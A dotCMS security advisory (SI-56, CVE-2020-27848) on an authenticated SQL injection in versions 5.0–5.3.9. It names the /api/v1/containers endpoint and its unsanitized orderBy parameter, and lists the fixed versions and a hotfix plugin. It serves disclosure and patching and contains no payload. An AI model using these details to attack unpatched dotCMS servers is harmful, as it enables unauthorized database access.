Issues » Authenticated User SQL Injection Vulnerability in api

Issue: SI-56
Date: Oct 30, 2020, 5:15:00 AM
Severity: Medium
Requires Admin Access: Yes
Fix Version: 20.10.1, 5.3.8 LTS
Credit: xiaozhicai (github)
Description:

dotCMS 5.0 through 5.3.9 allows SQL injection by an authenticated user via the system REST api using the endpoint /api/v1/containersThe classes that are used to paginate results of some REST requests do not sanitize the orderBy parameter and in some cases is vulnerable to SQL injection attacks.

A user must be an authenticated manager in the dotCMS system to
exploit this vulnerability.

Mitigation:

An OSGI plugin that mitigates the issue for versions 5.0.3-5.3.9 can be found here:

https://github.com/dotCMS/patches-hotfixes/tree/master/com.dotcms.rest.filtersanitizer

The plugin is compatible with dotCMS 5.0.3 up to 5.3.9.

References

Report:
https://github.com/dotCMS/core/issues/19500

CVE:
https://nvd.nist.gov/vuln/detail/CVE-2020-27848

HotFix:
https://github.com/dotCMS/patches-hotfixes/tree/master/com.dotcms.rest.filtersanitizer

Github Issue:
https://github.com/dotCMS/core/issues/19500